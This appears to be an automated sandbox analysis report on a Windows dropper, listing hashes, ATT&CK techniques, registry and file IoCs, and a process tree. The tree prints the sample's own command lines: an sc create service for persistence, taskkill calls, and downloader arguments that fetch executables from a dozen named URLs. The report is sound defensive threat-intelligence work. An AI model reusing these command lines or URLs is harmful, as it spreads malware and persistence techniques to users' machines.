3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686

Analysis

max time kernel
161s
max time network
179s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
23/11/2022, 20:04

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe
Size

3.9MB
MD5

ea607ff3700835e4e2def9b2a6f0ef02
SHA1

dd015715d58eea6e87fe148fe09caf53eb2f4014
SHA256

3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686
SHA512

44ae80ed2ab7c2e5f2ca3400d3753fb34da3720173a601e64f04987d981141a9b98a47112f2825ed46366c61b5f4fbefcec192ff0bb8fd381a07d2a17cecc235
SSDEEP

98304:306FOznLo0+Dd6uxcwXLyUhJ4P47OujILm5MY6Dm:33F6n80W6uGwXL5J4EMLYsDm

Score

8^/10

discovery persistence upx

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 22 IoCs

pid	Process
4648	irsetup.exe
4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
4080	pczh_113_25416.exe
3824	114lm_rebo_25416.exe
1676	88825416.exe
3508	parcs.dat
3832	Aqingz3.7.exe
4036	lovmon.exe
3908	Setup_027.exeex.exe
4212	taskkill.exe
2596	fgcn_101520.exeex.exe
3664	setup_ad7154.exeex.exe
4248	play_2098.exeex.exe
5084	doyo_3052_s.exeex.exe
2044	NmnPps_1088.exeex.exe
456	setup_qd262.exeex.exe
3884	wauee_jx029.exeex.exe
3160	pczh_110_157120.exeex.exe
3688	365weatherIns_184.exeex.exe
4540	setup_open_338.exeex.exe
3104	UUSEE_kb1003_Setup_162556.exeex.exe
5300	doyo_3052_s.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022e5d-133.dat	upx
behavioral2/files/0x0006000000022e5d-134.dat	upx
behavioral2/memory/4648-137-0x0000000000400000-0x00000000007CB000-memory.dmp	upx
behavioral2/memory/5300-259-0x0000000000400000-0x0000000000498000-memory.dmp	upx
behavioral2/memory/4648-260-0x0000000000400000-0x00000000007CB000-memory.dmp	upx

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	doyo_3052_s.exeex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	pczh_110_157120.exeex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	365weatherIns_184.exeex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	setup_open_338.exeex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	irsetup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	114lm_rebo_25416.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	setup_ad7154.exeex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	setup_qd262.exeex.exe

Loads dropped DLL 34 IoCs

pid	Process
4648	irsetup.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\niao.logPYG±¾µØÑéÖ¤	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
File created	C:\Windows\SysWOW64\niao2.logPYG±¾µØÑéÖ¤	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe

Drops file in Program Files directory 30 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\aqingz3.7\uninstall.exe	pczh_113_25416.exe
File created	C:\Program Files (x86)\Your Product\Uninstall\uniECB6.tmp	irsetup.exe
File created	C:\Program Files (x86)\Your Product\Uninstall\IRIMG1.JPG	irsetup.exe
File created	C:\Program Files (x86)\aqingz3.7\lovmon.exe	pczh_113_25416.exe
File created	C:\Program Files (x86)\Your Product\Uninstall\uninstall.xml	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\pczh_113_25416.exe	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe	irsetup.exe
File created	C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\114lm_rebo_25416.exe	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\cpacaht\yitangjifei_0.exe	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\Uninstall\IRIMG1.JPG	irsetup.exe
File created	C:\Program Files (x86)\Your Product\Uninstall\uninstall.dat	irsetup.exe
File created	C:\Program Files (x86)\Your Product\uninstall.exe	irsetup.exe
File created	C:\Program Files (x86)\Your Product\cpacaht\yitangjifei_0.exe	irsetup.exe
File created	C:\Program Files (x86)\aqingz3.7\Aqingz3.7.exe	pczh_113_25416.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221123235443.pma	setup.exe
File opened for modification	C:\Program Files (x86)\Your Product\Uninstall\uniECB6.tmp	irsetup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d6ffcd31-4594-4576-9c7c-e71832dfe9fe.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Your Product\Uninstall\uninstall.dat	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\88825416.exe	irsetup.exe
File created	C:\Program Files (x86)\Your Product\Uninstall\IRIMG2.JPG	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\parcs.dat	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
File created	C:\Program Files (x86)\aqingz3.7\Winsvr.exe	pczh_113_25416.exe
File created	C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\pczh_113_25416.exe	irsetup.exe
File created	C:\Program Files (x86)\Common Files\jq\open.ini	114lm_rebo_25416.exe
File created	C:\Program Files (x86)\Your Product\parcs.dat	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
File created	C:\Program Files (x86)\Your Product\lua5.1.dll	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\Uninstall\uninstall.xml	irsetup.exe
File created	C:\Program Files (x86)\Your Product\1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe	irsetup.exe
File opened for modification	C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\114lm_rebo_25416.exe	irsetup.exe
File created	C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\88825416.exe	irsetup.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3940	sc.exe
4220	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x0006000000022e70-142.dat	nsis_installer_1
behavioral2/files/0x0006000000022e70-142.dat	nsis_installer_2
behavioral2/files/0x0006000000022e70-143.dat	nsis_installer_1
behavioral2/files/0x0006000000022e70-143.dat	nsis_installer_2

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 13 IoCs

evasion

pid	Process
2208	taskkill.exe
3544	taskkill.exe
4856	taskkill.exe
4212	taskkill.exe
5896	taskkill.exe
6100	taskkill.exe
4284	taskkill.exe
2348	taskkill.exe
5744	taskkill.exe
5916	taskkill.exe
1000	taskkill.exe
5256	taskkill.exe
5980	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Your Product\QQ:317005222.lnk	irsetup.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3824	114lm_rebo_25416.exe
3824	114lm_rebo_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
4080	pczh_113_25416.exe
3824	114lm_rebo_25416.exe
3824	114lm_rebo_25416.exe
4856	msedge.exe
4856	msedge.exe
4084	msedge.exe
4084	msedge.exe
4844	msedge.exe
4844	msedge.exe
3704	identity_helper.exe
3704	identity_helper.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: 33	4036	lovmon.exe
Token: SeIncBasePriorityPrivilege	4036	lovmon.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	4284	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	4856	msedge.exe
Token: SeDebugPrivilege	4212	taskkill.exe
Token: 33	4036	lovmon.exe
Token: SeIncBasePriorityPrivilege	4036	lovmon.exe
Token: SeDebugPrivilege	5744	taskkill.exe
Token: SeDebugPrivilege	5896	taskkill.exe
Token: SeDebugPrivilege	5916	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	6100	taskkill.exe
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	5980	taskkill.exe
Token: 33	4036	lovmon.exe
Token: SeIncBasePriorityPrivilege	4036	lovmon.exe
Token: 33	4036	lovmon.exe
Token: SeIncBasePriorityPrivilege	4036	lovmon.exe
Token: 33	4036	lovmon.exe
Token: SeIncBasePriorityPrivilege	4036	lovmon.exe
Token: 33	4036	lovmon.exe
Token: SeIncBasePriorityPrivilege	4036	lovmon.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4036	lovmon.exe
3832	Aqingz3.7.exe
4844	msedge.exe
4844	msedge.exe

Suspicious use of SetWindowsHookEx 39 IoCs

pid	Process
4648	irsetup.exe
4648	irsetup.exe
4648	irsetup.exe
4080	pczh_113_25416.exe
4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
3824	114lm_rebo_25416.exe
1676	88825416.exe
1676	88825416.exe
1676	88825416.exe
1676	88825416.exe
1676	88825416.exe
3508	parcs.dat
4648	irsetup.exe
3832	Aqingz3.7.exe
4036	lovmon.exe
4036	lovmon.exe
3832	Aqingz3.7.exe
3908	Setup_027.exeex.exe
4036	lovmon.exe
4036	lovmon.exe
3832	Aqingz3.7.exe
3832	Aqingz3.7.exe
4212	taskkill.exe
2596	fgcn_101520.exeex.exe
3664	setup_ad7154.exeex.exe
4248	play_2098.exeex.exe
5084	doyo_3052_s.exeex.exe
2044	NmnPps_1088.exeex.exe
456	setup_qd262.exeex.exe
3884	wauee_jx029.exeex.exe
3160	pczh_110_157120.exeex.exe
3688	365weatherIns_184.exeex.exe
4540	setup_open_338.exeex.exe
3104	UUSEE_kb1003_Setup_162556.exeex.exe
5300	doyo_3052_s.exe
5300	doyo_3052_s.exe
5300	doyo_3052_s.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 380 wrote to memory of 4648	380	3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe	81
PID 380 wrote to memory of 4648	380	3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe	81
PID 380 wrote to memory of 4648	380	3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe	81
PID 4648 wrote to memory of 4444	4648	irsetup.exe	83
PID 4648 wrote to memory of 4444	4648	irsetup.exe	83
PID 4648 wrote to memory of 4444	4648	irsetup.exe	83
PID 4648 wrote to memory of 4080	4648	irsetup.exe	84
PID 4648 wrote to memory of 4080	4648	irsetup.exe	84
PID 4648 wrote to memory of 4080	4648	irsetup.exe	84
PID 4648 wrote to memory of 3824	4648	irsetup.exe	85
PID 4648 wrote to memory of 3824	4648	irsetup.exe	85
PID 4648 wrote to memory of 3824	4648	irsetup.exe	85
PID 4648 wrote to memory of 1676	4648	irsetup.exe	86
PID 4648 wrote to memory of 1676	4648	irsetup.exe	86
PID 4648 wrote to memory of 1676	4648	irsetup.exe	86
PID 4444 wrote to memory of 3508	4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe	87
PID 4444 wrote to memory of 3508	4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe	87
PID 4444 wrote to memory of 3508	4444	1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe	87
PID 4080 wrote to memory of 3940	4080	pczh_113_25416.exe	88
PID 4080 wrote to memory of 3940	4080	pczh_113_25416.exe	88
PID 4080 wrote to memory of 3940	4080	pczh_113_25416.exe	88
PID 4648 wrote to memory of 4844	4648	irsetup.exe	89
PID 4648 wrote to memory of 4844	4648	irsetup.exe	89
PID 4844 wrote to memory of 1980	4844	msedge.exe	92
PID 4844 wrote to memory of 1980	4844	msedge.exe	92
PID 4080 wrote to memory of 4220	4080	pczh_113_25416.exe	93
PID 4080 wrote to memory of 4220	4080	pczh_113_25416.exe	93
PID 4080 wrote to memory of 4220	4080	pczh_113_25416.exe	93
PID 4080 wrote to memory of 3832	4080	pczh_113_25416.exe	95
PID 4080 wrote to memory of 3832	4080	pczh_113_25416.exe	95
PID 4080 wrote to memory of 3832	4080	pczh_113_25416.exe	95
PID 4648 wrote to memory of 2332	4648	irsetup.exe	96
PID 4648 wrote to memory of 2332	4648	irsetup.exe	96
PID 2332 wrote to memory of 4376	2332	msedge.exe	97
PID 2332 wrote to memory of 4376	2332	msedge.exe	97
PID 4080 wrote to memory of 4036	4080	pczh_113_25416.exe	98
PID 4080 wrote to memory of 4036	4080	pczh_113_25416.exe	98
PID 4080 wrote to memory of 4036	4080	pczh_113_25416.exe	98
PID 3824 wrote to memory of 3908	3824	114lm_rebo_25416.exe	100
PID 3824 wrote to memory of 3908	3824	114lm_rebo_25416.exe	100
PID 3824 wrote to memory of 3908	3824	114lm_rebo_25416.exe	100
PID 3908 wrote to memory of 4720	3908	Setup_027.exeex.exe	101
PID 3908 wrote to memory of 4720	3908	Setup_027.exeex.exe	101
PID 3908 wrote to memory of 4720	3908	Setup_027.exeex.exe	101
PID 3824 wrote to memory of 4212	3824	114lm_rebo_25416.exe	132
PID 3824 wrote to memory of 4212	3824	114lm_rebo_25416.exe	132
PID 3824 wrote to memory of 4212	3824	114lm_rebo_25416.exe	132
PID 3824 wrote to memory of 2596	3824	114lm_rebo_25416.exe	104
PID 3824 wrote to memory of 2596	3824	114lm_rebo_25416.exe	104
PID 3824 wrote to memory of 2596	3824	114lm_rebo_25416.exe	104
PID 3824 wrote to memory of 3664	3824	114lm_rebo_25416.exe	105
PID 3824 wrote to memory of 3664	3824	114lm_rebo_25416.exe	105
PID 3824 wrote to memory of 3664	3824	114lm_rebo_25416.exe	105
PID 3824 wrote to memory of 4248	3824	114lm_rebo_25416.exe	106
PID 3824 wrote to memory of 4248	3824	114lm_rebo_25416.exe	106
PID 3824 wrote to memory of 4248	3824	114lm_rebo_25416.exe	106
PID 3824 wrote to memory of 5084	3824	114lm_rebo_25416.exe	107
PID 3824 wrote to memory of 5084	3824	114lm_rebo_25416.exe	107
PID 3824 wrote to memory of 5084	3824	114lm_rebo_25416.exe	107
PID 2596 wrote to memory of 2672	2596	fgcn_101520.exeex.exe	108
PID 2596 wrote to memory of 2672	2596	fgcn_101520.exeex.exe	108
PID 2596 wrote to memory of 2672	2596	fgcn_101520.exeex.exe	108
PID 4212 wrote to memory of 1324	4212	taskkill.exe	110
PID 4212 wrote to memory of 1324	4212	taskkill.exe	110

C:\Users\Admin\AppData\Local\Temp\3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe
"C:\Users\Admin\AppData\Local\Temp\3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:380
- C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
  "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1754994 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\3cb3f69376947276ace4fea8f8fb53fbda5f898c123418e3dfcf38b6be1f5686.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2295526160-1155304984-640977766-1000"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Loads dropped DLL
  - Drops file in Program Files directory
  - NTFS ADS
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4648
- - C:\Program Files (x86)\Your Product\1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe
    "C:\Program Files (x86)\Your Product\1,ÏÈÆô¶¯´ËÆÆ½âÆ÷.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4444
  - - C:\Program Files (x86)\Your Product\parcs.dat
      parcs.dat
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3508
- - C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\pczh_113_25416.exe
    "C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\pczh_113_25416.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4080
  - - C:\Windows\SysWOW64\sc.exe
      sc create "Winssvr Service" binPath= "C:\Program Files (x86)\aqingz3.7\Winsvr.exe" start= auto
      4⤵
      Launches sc.exe
      PID:3940
  - - C:\Windows\SysWOW64\sc.exe
      sc description "Winssvr Service" "Winssvr Service"
      4⤵
      Launches sc.exe
      PID:4220
  - - C:\Program Files (x86)\aqingz3.7\Aqingz3.7.exe
      "C:\Program Files (x86)\aqingz3.7\Aqingz3.7.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:3832
  - - C:\Program Files (x86)\aqingz3.7\lovmon.exe
      "C:\Program Files (x86)\aqingz3.7\lovmon.exe" /s
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:4036
- - C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\114lm_rebo_25416.exe
    "C:\Program Files (x86)\Your Product\cpacaht\ÐÂ½¨ÎÄ¼þ¼Ð\114lm_rebo_25416.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3824
  - - C:\ProgramData\Setup_027.exeex.exe
      "C:\ProgramData\Setup_027.exeex.exe" C:\ProgramData\Setup_027.exe7231889http://www.sfsky.net/tdj/Setup_027.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3908
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Setup_027.exeex.exe.bat
        5⤵
        
        PID:4720
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM Setup_027.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284
  - - C:\ProgramData\kuping_s_51630.exeex.exe
      "C:\ProgramData\kuping_s_51630.exeex.exe" C:\ProgramData\kuping_s_51630.exe7231889http://download.wallba.com/download.php/kuping_s_51630.exe?37214abc
      4⤵
      PID:4212
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\kuping_s_51630.exeex.exe.bat
        5⤵
        
        PID:1324
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM kuping_s_51630.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
  - - C:\ProgramData\fgcn_101520.exeex.exe
      "C:\ProgramData\fgcn_101520.exeex.exe" C:\ProgramData\fgcn_101520.exe7231889http://down5.flashget.com/un/fgcn_101520.exe?37214abc.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2596
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\fgcn_101520.exeex.exe.bat
        5⤵
        
        PID:2672
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM fgcn_101520.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348
  - - C:\ProgramData\setup_ad7154.exeex.exe
      "C:\ProgramData\setup_ad7154.exeex.exe" C:\ProgramData\setup_ad7154.exe7231889http://ffzds.qiniudn.com/setup_ad7154.exe?37214abc.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetWindowsHookEx
      PID:3664
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\setup_ad7154.exeex.exe.bat
        5⤵
        
        PID:5608
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM setup_ad7154.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5744
  - - C:\ProgramData\play_2098.exeex.exe
      "C:\ProgramData\play_2098.exeex.exe" C:\ProgramData\play_2098.exe7231889http://click.t3nlink.com/link/157141/?name=play_2098.exe?37214abc
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4248
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\play_2098.exeex.exe.bat
        5⤵
        
        PID:3296
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM play_2098.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3544
  - - C:\ProgramData\doyo_3052_s.exeex.exe
      "C:\ProgramData\doyo_3052_s.exeex.exe" C:\ProgramData\doyo_3052_s.exe7231889http://soft.doyo.cn/soft/doyo_3052_s.exe?37214abc
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetWindowsHookEx
      PID:5084
    - - C:\ProgramData\doyo_3052_s.exe
        
        "C:\ProgramData\doyo_3052_s.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\doyo_3052_s.exeex.exe.bat
        5⤵
        
        PID:5356
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM doyo_3052_s.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
  - - C:\ProgramData\NmnPps_1088.exeex.exe
      "C:\ProgramData\NmnPps_1088.exeex.exe" C:\ProgramData\NmnPps_1088.exe7231889http://down.u5c.net/nmnpps_1088.exe?37214abc
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\NmnPps_1088.exeex.exe.bat
        5⤵
        
        PID:3660
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM NmnPps_1088.exeex.exe
        6⤵
        Kills process with taskkill
        
        PID:4856
  - - C:\ProgramData\setup_qd262.exeex.exe
      "C:\ProgramData\setup_qd262.exeex.exe" C:\ProgramData\setup_qd262.exe7231889http://ffzds.qiniudn.com/setup_qd262%20.exe?37214abc
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetWindowsHookEx
      PID:456
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\setup_qd262.exeex.exe.bat
        5⤵
        
        PID:5820
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM setup_qd262.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5980
  - - C:\ProgramData\wauee_jx029.exeex.exe
      "C:\ProgramData\wauee_jx029.exeex.exe" C:\ProgramData\wauee_jx029.exe7231889http://down.jdrili.com/wauee_jx029.exe?37214abc
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\wauee_jx029.exeex.exe.bat
        5⤵
        
        PID:5084
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM wauee_jx029.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1000
  - - C:\ProgramData\pczh_110_157120.exeex.exe
      "C:\ProgramData\pczh_110_157120.exeex.exe" C:\ProgramData\pczh_110_157120.exe7231889http://diaozhatian.qiniudn.com/pczh_110_157120.exe?diaozhatian.com/aa.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetWindowsHookEx
      PID:3160
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\pczh_110_157120.exeex.exe.bat
        5⤵
        
        PID:3836
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM pczh_110_157120.exeex.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6100
  - - C:\ProgramData\365weatherIns_184.exeex.exe
      "C:\ProgramData\365weatherIns_184.exeex.exe" C:\ProgramData\365weatherIns_184.exe7231889http://lm.beilequ.com/update/365/365weatherIns_184.exe?774234124dotaallstart
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetWindowsHookEx
      PID:3688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\365weatherIns_184.exeex.exe.bat
        5⤵
        
        PID:5736
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM 365weatherIns_184.exeex.exe
        6⤵
        Kills process with taskkill
